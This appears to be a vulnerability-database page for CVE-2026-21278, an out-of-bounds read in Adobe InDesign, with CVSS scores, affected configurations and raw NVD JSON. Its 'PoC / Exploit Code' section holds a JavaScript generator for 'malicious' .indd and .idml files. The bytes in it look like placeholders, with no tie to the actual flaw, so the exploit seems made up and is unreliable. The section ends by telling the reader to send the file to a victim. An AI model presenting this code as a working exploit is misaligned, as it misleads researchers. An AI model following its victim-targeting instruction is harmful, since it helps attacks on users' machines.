Security Vulnerability Report
CVE-2026-21278 CVSS 5.5 MEDIUM

Published: 2026-01-13 19:16:26
Last Modified: 2026-01-14 19:28:16

Description

InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* (versions before 20.5.1) - VULNERABLE
cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* (versions from 21.0 up to, but not including, 21.1) - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe InDesign Desktop <= 21.0
Adobe InDesign Desktop <= 19.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-21278 PoC - Malicious InDesign Document Trigger
// This PoC demonstrates the OOB read vulnerability in Adobe InDesign Desktop
// DISCLAIMER: For educational and security research purposes only

// Method 1: Generate malicious .indd file with crafted binary data
const fs = require('fs');

function createMaliciousIndd() {
  // InDesign document header with malformed structure
  const header = Buffer.from([
    0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06,
    0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06
  ]);

  // Crafted data that triggers OOB read in document parser
  const triggerData = Buffer.alloc(1024);
  triggerData.writeUInt32LE(0x41414141, 0); // Abnormal marker
  triggerData.writeUInt32LE(0xFFFFFFFF, 4); // Overflow value
  triggerData.writeUInt32LE(0x42424242, 8); // Padding trigger

  // Malformed object descriptor
  const objDesc = Buffer.from([
    0x00, 0x00, 0x00, 0x00, // Size field
    0xFF, 0xFF, 0xFF, 0xFF, // Boundary bypass
    0x00, 0x00, 0x00, 0x01  // Type indicator
  ]);

  const maliciousFile = Buffer.concat([header, triggerData, objDesc]);
  fs.writeFileSync('CVE-2026-21278_malicious.indd', maliciousFile);
  console.log('[+] Malicious InDesign file created: CVE-2026-21278_malicious.indd');
}

// Method 2: Create malformed IDML package
function createMaliciousIdml() {
  const idmlContent = `<?xml version="1.0" encoding="UTF-8"?>
<idPkg:Document xmlns:idPkg="http://ns.adobe.com/AdobeInDesign/idml/1.0/">
  <Document>
    <Story>
      <ParagraphStyleRange>
        <CharacterStyleRange>
          <Content>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</Content>
          <Properties>
            <PointSize olyAttribute="malformed"/>
          </Properties>
        </CharacterStyleRange>
      </ParagraphStyleRange>
    </Story>
  </Document>
</idPkg:Document>`;
  fs.writeFileSync('CVE-2026-21278_malicious.idml', idmlContent);
  console.log('[+] Malicious IDML file created: CVE-2026-21278_malicious.idml');
}

createMaliciousIndd();
createMaliciousIdml();
console.log('[+] PoC files generated successfully');
console.log('[!] Usage: Send the malicious .indd file to victim and wait for them to open it');

References

https://helpx.adobe.com/security/products/indesign/apsb26-02.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21278", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:25.530", "lastModified": "2026-01-14T19:28:15.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones de InDesign Desktop 21.0, 19.5.5 y anteriores están afectadas por una vulnerabilidad de lectura fuera de límites que podría conducir a la exposición de memoria. Un atacante podría aprovechar esta vulnerabilidad para acceder a información sensible almacenada en la memoria. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.1", "matchCriteriaId": "7BFF153C-8825-407C-AF58-4AC567601D68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "21.0", "versionEndExcluding": "21.1", "matchCriteriaId": "7BF7435F-7314-440A-89A8-8C3D4CCCDD63"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/indesign/apsb26-02.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}